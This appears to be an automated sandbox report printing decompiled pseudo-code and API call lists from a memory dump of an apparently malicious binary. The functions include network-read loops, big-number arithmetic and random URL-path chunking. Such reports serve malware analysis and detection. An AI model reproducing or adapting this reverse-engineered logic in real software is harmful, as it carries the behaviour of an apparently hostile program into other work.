                                                          • Instruction Fuzzy Hash: 2B418072900699ABCB19AFE6CD89DEE7FBCFF48350F100425F981AB111D6319D458BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E005E53C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				void _v92;
                                                          				void _v236;
                                                          				void* _t55;
                                                          				unsigned int _t56;
                                                          				signed int _t66;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				signed int _t79;
                                                          				void* _t81;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				signed int* _t99;
                                                          				signed int _t101;
                                                          				signed int _t103;
                                                          				void* _t107;
                                                          
                                                          				_t92 = _a12;
                                                          				_t101 = __eax;
                                                          				_t55 = E005E1AD1(_a16, _t92);
                                                          				_t79 = _t55;
                                                          				if(_t79 == 0) {
                                                          					L18:
                                                          					return _t55;
                                                          				}
                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                          				_t81 = 0;
                                                          				_t96 = 0x20;
                                                          				if(_t56 == 0) {
                                                          					L4:
                                                          					_t97 = _t96 - _t81;
                                                          					_v12 = _t96 - _t81;
                                                          					E005E50FF(_t79,  &_v236);
                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E005E5745(_t101,  &_v236, _a8, _t96 - _t81);
                                                          					E005E5745(_t79,  &_v92, _a12, _t97);
                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                          					_t66 = E005E50FF(_t101, 0x5ed1b0);
                                                          					_t103 = _t101 - _t79;
                                                          					_a8 = _t103;
                                                          					if(_t103 < 0) {
                                                          						L17:
                                                          						E005E50FF(_a16, _a4);
                                                          						E005E5088(_t79,  &_v236, _a4, _t97);
                                                          						memset( &_v236, 0, 0x8c);
                                                          						_t55 = memset( &_v92, 0, 0x44);
                                                          						goto L18;
                                                          					}
                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                          					do {
                                                          						if(_v8 != 0xffffffff) {
                                                          							_push(1);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push( *_t99);
                                                          							L005EAF2E();
                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                          							asm("adc edx, esi");
                                                          							_push(0);
                                                          							_push(_v8 + 1);
                                                          							_push(_t92);
                                                          							_push(_t74);
                                                          							L005EAF28();
                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                          								_t74 = _t74 | 0xffffffff;
                                                          								_v16 = _v16 & 0x00000000;
                                                          							}
                                                          						} else {
                                                          							_t74 =  *_t99;
                                                          						}
                                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                          						_a12 = _t74;
                                                          						_t76 = E005E5F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                          						while(1) {
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							L13:
                                                          							_t92 =  &_v92;
                                                          							if(E005E90C2(_t79, _t92, _t106) < 0) {
                                                          								break;
                                                          							}
                                                          							L14:
                                                          							_a12 = _a12 + 1;
                                                          							_t76 = E005E6044(_t79,  &_v92, _t106, _t106);
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						_a8 = _a8 - 1;
                                                          						_t66 = _a12;
                                                          						_t99 = _t99 - 4;
                                                          						 *(0x5ed1b0 + _a8 * 4) = _t66;
                                                          					} while (_a8 >= 0);
                                                          					_t97 = _v12;
                                                          					goto L17;
                                                          				}
                                                          				while(_t81 < _t96) {
                                                          					_t81 = _t81 + 1;
                                                          					_t56 = _t56 >> 1;
                                                          					if(_t56 != 0) {
                                                          						continue;
                                                          					}
                                                          					goto L4;
                                                          				}
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 005E5473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 005E5489
                                                          • memset.NTDLL ref: 005E5529
                                                          • memset.NTDLL ref: 005E5539
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 30af34fc71cbfd30283563a111d6cc3ab09ab09b0abbfd463eca8772250551b2
                                                          • Instruction ID: 82c3dbdc485aa1f5562d16585f107270f317d88769e5846527bf185b4e39d8f0
                                                          • Opcode Fuzzy Hash: 30af34fc71cbfd30283563a111d6cc3ab09ab09b0abbfd463eca8772250551b2
                                                          • Instruction Fuzzy Hash: CC41067160069AABDF18DFAACC45BDE7B75FF84314F008529F946A7180EB709E45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 005EA82E
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • ResetEvent.KERNEL32(?), ref: 005EA8A2
                                                          • GetLastError.KERNEL32 ref: 005EA8C5
                                                          • GetLastError.KERNEL32 ref: 005EA970
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: edd6cfe248ec973b70da3165914ada2207acfe4e4d5aa1c29024e71bec038545
                                                          • Instruction ID: 61f33df61bc9ee812c610cb9b0175f71c92203d2c1f42148cf6db7850f8d2e35
                                                          • Opcode Fuzzy Hash: edd6cfe248ec973b70da3165914ada2207acfe4e4d5aa1c29024e71bec038545
                                                          • Instruction Fuzzy Hash: A1417F72500284BFD7399FB2CC88E6B7FBDFB95700B114929F582D50A1D731A949DA31
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 42%
                                                          			E005E15FF(void* __eax, void* __ecx) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				intOrPtr _v16;
                                                          				char _v20;
                                                          				void* __esi;
                                                          				void* _t30;
                                                          				intOrPtr _t38;
                                                          				intOrPtr* _t39;
                                                          				intOrPtr* _t41;
                                                          				void* _t54;
                                                          				long _t64;
                                                          				void* _t67;
                                                          				void* _t69;
                                                          
                                                          				_t58 = __ecx;
                                                          				_t67 = __eax;
                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                          					L2:
                                                          					_t30 = _t67;
                                                          					_pop(_t68);
                                                          					_t69 = _t30;
                                                          					_t64 = 0;
                                                          					ResetEvent( *(_t69 + 0x1c));
                                                          					_push( &_v8);
                                                          					_push(4);
                                                          					_push( &_v20);
                                                          					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          					if( *0x5ed134() != 0) {
                                                          						L9:
                                                          						if(_v8 == 0) {
                                                          							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                          						} else {
                                                          							 *0x5ed164(0, 1,  &_v12);
                                                          							if(0 != 0) {
                                                          								_t64 = 8;
                                                          							} else {
                                                          								_t38 = E005EA71F(0x1000);
                                                          								_v16 = _t38;
                                                          								if(_t38 == 0) {
                                                          									_t64 = 8;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(_v8);
                                                          									_push( &_v20);
                                                          									while(1) {
                                                          										_t41 = _v12;
                                                          										_t61 =  *_t41;
                                                          										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                          										ResetEvent( *(_t69 + 0x1c));
                                                          										_push( &_v8);
                                                          										_push(0x1000);
                                                          										_push(_v16);
                                                          										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          										if( *0x5ed134() != 0) {
                                                          											goto L17;
                                                          										}
                                                          										_t64 = GetLastError();
                                                          										if(_t64 == 0x3e5) {
                                                          											_t64 = E005E5646( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                          											if(_t64 == 0) {
                                                          												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          												if(_t64 == 0) {
                                                          													goto L17;
                                                          												}
                                                          											}
                                                          										}
                                                          										L19:
                                                          										E005EA734(_v16);
                                                          										if(_t64 == 0) {
                                                          											_t64 = E005E70CC(_v12, _t69);
                                                          										}
                                                          										goto L22;
                                                          										L17:
                                                          										_t64 = 0;
                                                          										if(_v8 != 0) {
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											_push(_v16);
                                                          											continue;
                                                          										}
                                                          										goto L19;
                                                          									}
                                                          								}
                                                          								L22:
                                                          								_t39 = _v12;
                                                          								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t64 = GetLastError();
                                                          						if(_t64 != 0x3e5) {
                                                          							L8:
                                                          							if(_t64 == 0) {
                                                          								goto L9;
                                                          							}
                                                          						} else {
                                                          							_t64 = E005E5646( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                          							if(_t64 == 0) {
                                                          								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					return _t64;
                                                          				} else {
                                                          					_t54 = E005E9242(__ecx, __eax);
                                                          					if(_t54 != 0) {
                                                          						return _t54;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 005E18EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 005E1907
                                                          • ResetEvent.KERNEL32(?), ref: 005E1980
                                                          • GetLastError.KERNEL32 ref: 005E199B
                                                            • Part of subcall function 005E9242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 005E9259
                                                            • Part of subcall function 005E9242: SetEvent.KERNEL32(?), ref: 005E9269
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: ca20e6e9e2869d8bc7b8b8763ec3b30f2bdf2cdd83cf32000103aa7e0cff363b
                                                          • Instruction ID: 3c21c63b02a39ed966ce6eac9c3feee396cb271768fdfae5734e33e116357b2d
                                                          • Opcode Fuzzy Hash: ca20e6e9e2869d8bc7b8b8763ec3b30f2bdf2cdd83cf32000103aa7e0cff363b
                                                          • Instruction Fuzzy Hash: 9F41E532600A84EFCB299BB6CC48AAE7BB9BF84360F110529E5D2D7151EB30ED459B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 005E3B0D
                                                          • SysAllocString.OLEAUT32(005E85ED), ref: 005E3B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E3B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E3B73
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 44c35ed7e8f4618dd9c374437a249dd8cdc5defd39928b4f610accf8a23bcd67
                                                          • Instruction ID: 75ce1ac4f6e846699d49872d9d003d8800b773f8de106c373dd318237d5ce01c
                                                          • Opcode Fuzzy Hash: 44c35ed7e8f4618dd9c374437a249dd8cdc5defd39928b4f610accf8a23bcd67
                                                          • Instruction Fuzzy Hash: 64311076900289EFCB08DF99D8C88AE7FB9FF58300B10442EF5869B250D7349A45CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrcmp.KERNEL32(00000001,00000001), ref: 005E5EA7
                                                          • lstrlen.KERNEL32(00000001,005EC298,00000028,005E6E63,00000000), ref: 005E5EB2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcmplstrlen
                                                          • String ID: (cn^$cn^
                                                          • API String ID: 898299967-1381931192
                                                          • Opcode ID: 4d9618b39a82da0521ffa697f7d021089f4abc25df3cad8479c05d6a64cd0b10
                                                          • Instruction ID: 1e69f3ca4b33e1062c11f279f8079d7162ec5cfd76c0d32cdb9738ac0d1b3855
                                                          • Opcode Fuzzy Hash: 4d9618b39a82da0521ffa697f7d021089f4abc25df3cad8479c05d6a64cd0b10
                                                          • Instruction Fuzzy Hash: 81414CB1910685CFCF1CCFAAC9846ADBBF5BF58309B248969E096AB251E7309941DF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E005E9242(void* __ecx, void* __esi) {
                                                          				char _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				long _v20;
                                                          				long _t34;
                                                          				long _t39;
                                                          				long _t42;
                                                          				long _t56;
                                                          				intOrPtr _t58;
                                                          				void* _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t61 = __esi;
                                                          				_t59 = __ecx;
                                                          				_t60 =  *0x5ed13c; // 0x5eabf1
                                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                          				do {
                                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                          					_v20 = _t34;
                                                          					if(_t34 != 0) {
                                                          						L3:
                                                          						_push( &_v16);
                                                          						_push( &_v8);
                                                          						_push(_t61 + 0x2c);
                                                          						_push(0x20000013);
                                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          						_v8 = 4;
                                                          						_v16 = 0;
                                                          						if( *_t60() == 0) {
                                                          							_t39 = GetLastError();
                                                          							_v12 = _t39;
                                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                          								L15:
                                                          								return _v12;
                                                          							} else {
                                                          								goto L11;
                                                          							}
                                                          						}
                                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_v16 = 0;
                                                          							_v8 = 0;
                                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                          							_t58 = E005EA71F(_v8 + 1);
                                                          							if(_t58 == 0) {
                                                          								_v12 = 8;
                                                          							} else {
                                                          								_push( &_v16);
                                                          								_push( &_v8);
                                                          								_push(_t58);
                                                          								_push(0x16);
                                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          								if( *_t60() == 0) {
                                                          									E005EA734(_t58);
                                                          									_v12 = GetLastError();
                                                          								} else {
                                                          									 *((char*)(_t58 + _v8)) = 0;
                                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                          								}
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					SetEvent( *(_t61 + 0x1c));
                                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                          					_v12 = _t56;
                                                          					if(_t56 != 0) {
                                                          						goto L15;
                                                          					}
                                                          					goto L3;
                                                          					L11:
                                                          					_t42 = E005E5646( *(_t61 + 0x1c), _t59, 0xea60);
                                                          					_v12 = _t42;
                                                          				} while (_t42 == 0);
                                                          				goto L15;
                                                          			}
















                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 005E9259
                                                          • SetEvent.KERNEL32(?), ref: 005E9269
                                                          • GetLastError.KERNEL32 ref: 005E92F2
                                                            • Part of subcall function 005E5646: WaitForMultipleObjects.KERNEL32(00000002,005EA8E3,00000000,005EA8E3,?,?,?,005EA8E3,0000EA60), ref: 005E5661
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          • GetLastError.KERNEL32(00000000), ref: 005E9327
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: 556e3f01598b9aceb0856358aef6326a6674404a7ec3f5c80dbd1d10691571e8
                                                          • Instruction ID: 0b61764bb7340056a26f0d33ca2624706fb0f03821d8483e72ac3479787e6dbd
                                                          • Opcode Fuzzy Hash: 556e3f01598b9aceb0856358aef6326a6674404a7ec3f5c80dbd1d10691571e8
                                                          • Instruction Fuzzy Hash: 37312FB5900389EFDB24DFA6CCC499EBFB8FB18304F10496AE592E6151D730EA499F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E005E36B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                          				intOrPtr _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				void* __esi;
                                                          				void* _t29;
                                                          				void* _t38;
                                                          				signed int* _t39;
                                                          				void* _t40;
                                                          
                                                          				_t36 = __ecx;
                                                          				_v32 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v12 = _a4;
                                                          				_t38 = E005E3BB9(__ecx,  &_v32);
                                                          				if(_t38 != 0) {
                                                          					L12:
                                                          					_t39 = _a8;
                                                          					L13:
                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                          						_t16 =  &(_t39[1]); // 0x5
                                                          						_t23 = _t16;
                                                          						if( *_t16 != 0) {
                                                          							E005E4F79(_t23);
                                                          						}
                                                          					}
                                                          					return _t38;
                                                          				}
                                                          				if(E005EA2F9(0x40,  &_v16) != 0) {
                                                          					_v16 = 0;
                                                          				}
                                                          				_t40 = CreateEventA(0x5ed2ac, 1, 0,  *0x5ed344);
                                                          				if(_t40 != 0) {
                                                          					SetEvent(_t40);
                                                          					Sleep(0xbb8);
                                                          					CloseHandle(_t40);
                                                          				}
                                                          				_push( &_v32);
                                                          				if(_a12 == 0) {
                                                          					_t29 = E005EA446(_t36);
                                                          				} else {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t29 = E005E853F(_t36);
                                                          				}
                                                          				_t41 = _v16;
                                                          				_t38 = _t29;
                                                          				if(_v16 != 0) {
                                                          					E005E4F14(_t41);
                                                          				}
                                                          				if(_t38 != 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					_t39 = _a8;
                                                          					_t38 = E005E11EE( &_v32, _t39);
                                                          					goto L13;
                                                          				}
                                                          			}













                                                          APIs
                                                          • CreateEventA.KERNEL32(005ED2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,005E52AA,?,00000001,?), ref: 005E3702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,005E52AA,?,00000001,?,00000002,?,?,^]^,?), ref: 005E370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,005E52AA,?,00000001,?,00000002,?,?,^]^,?), ref: 005E371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,005E52AA,?,00000001,?,00000002,?,?,^]^,?), ref: 005E3721
                                                            • Part of subcall function 005EA446: WaitForSingleObject.KERNEL32(00000000,00000001,?,?,?,00000000,A7^,?,?,?,?,?,005E3741,?), ref: 005EA520
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 2717ed263233bdd841c0c8d0698886ee4236ea977133120e5012bcc02452e117
                                                          • Instruction ID: addab0db08e5705a268fc5d99a104aa7964a385a025ffcfcac4af7dbb60ff735
                                                          • Opcode Fuzzy Hash: 2717ed263233bdd841c0c8d0698886ee4236ea977133120e5012bcc02452e117
                                                          • Instruction Fuzzy Hash: 9F21A4F3900296ABCF18AFE6888D8AEBF69FF44350B004425FA91A7100D6349B45CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E005E17E5(unsigned int __eax, void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _t21;
                                                          				signed short _t23;
                                                          				char* _t27;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				unsigned int _t33;
                                                          				void* _t37;
                                                          				unsigned int _t38;
                                                          				void* _t41;
                                                          				void* _t42;
                                                          				int _t45;
                                                          				void* _t46;
                                                          
                                                          				_t42 = __eax;
                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                          				_t38 = __eax;
                                                          				_t30 = RtlAllocateHeap( *0x5ed238, 0, (__eax >> 3) + __eax + 1);
                                                          				_v12 = _t30;
                                                          				if(_t30 != 0) {
                                                          					_v8 = _t42;
                                                          					do {
                                                          						_t33 = 0x18;
                                                          						if(_t38 <= _t33) {
                                                          							_t33 = _t38;
                                                          						}
                                                          						_t21 =  *0x5ed250; // 0x27747965
                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                          						 *0x5ed250 = _t23;
                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                          						memcpy(_t30, _v8, _t45);
                                                          						_v8 = _v8 + _t45;
                                                          						_t27 = _t30 + _t45;
                                                          						_t38 = _t38 - _t45;
                                                          						_t46 = _t46 + 0xc;
                                                          						 *_t27 = 0x2f;
                                                          						_t13 = _t27 + 1; // 0x1
                                                          						_t30 = _t13;
                                                          					} while (_t38 > 8);
                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                          				}
                                                          				return _v12;
                                                          			}

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,005E1C49,00000000,?,?,005E20C2,?,016695B0), ref: 005E17F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 005E1808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,005E1C49,00000000,?,?,005E20C2,?,016695B0), ref: 005E184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 005E186D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: dff138f6d79a05ba56da2e49b91247ea5376d630fd0f93c885e4c41549a028de
                                                          • Instruction ID: 513ce11fe2685b0fbdc85d35025a7fe2963e390fa0e6f0308768262996f2e098
                                                          • Opcode Fuzzy Hash: dff138f6d79a05ba56da2e49b91247ea5376d630fd0f93c885e4c41549a028de
                                                          • Instruction Fuzzy Hash: 71110A76A00295AFD3148F69DC88E5E7FBAEBD03A0B050176F644DB150E7709D04D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E005E6840(void* __esi) {
                                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          
                                                          				_v4 = 0;
                                                          				memset(__esi, 0, 0x38);
                                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                                          				 *(__esi + 0x1c) = _t8;
                                                          				if(_t8 != 0) {
                                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                                          					 *(__esi + 0x20) = _t10;
                                                          					if(_t10 == 0) {
                                                          						CloseHandle( *(__esi + 0x1c));
                                                          					} else {
                                                          						_v4 = 1;
                                                          					}
                                                          				}
                                                          				return _v4;
                                                          			}

                                                          APIs
                                                          • memset.NTDLL ref: 005E684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 005E6863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 005E6870
                                                          • CloseHandle.KERNEL32(?), ref: 005E6882
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 7870642a90fd9990b6aff4eec99928b5779e94cdf8c2bc3eb855ffb449a1b614
                                                          • Instruction ID: cbf5a9248738d9bedde4b310c9896dbe9f9dcf3150386ca510cfd2f2607e52bc
                                                          • Opcode Fuzzy Hash: 7870642a90fd9990b6aff4eec99928b5779e94cdf8c2bc3eb855ffb449a1b614
                                                          • Instruction Fuzzy Hash: 95F030B1504348AFD2186F269CC482BBFECFBA12D9B114A6DF18281511D671A8098A60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E005E56FA(int __eax, intOrPtr _a4) {
                                                          				void* _v0;
                                                          				void* _t12;
                                                          				int _t13;
                                                          				int _t14;
                                                          
                                                          				_t14 = __eax;
                                                          				__imp__(_a4);
                                                          				_t13 = __eax;
                                                          				if(__eax > __eax) {
                                                          					_t14 = __eax;
                                                          				}
                                                          				_t2 = _t14 + 1; // 0x1
                                                          				_t12 = E005EA71F(_t2);
                                                          				if(_t12 != 0) {
                                                          					memcpy(_t12, _v0, _t13);
                                                          					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                                          				}
                                                          				return _t12;
                                                          			}

                                                          APIs
                                                          • lstrlen.KERNEL32(63699BC3,00000000,750DD3B0,%]^,005E8AD8,00000000,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005), ref: 005E5703
                                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,005E5D25), ref: 005E5726
                                                          • memset.NTDLL ref: 005E5735
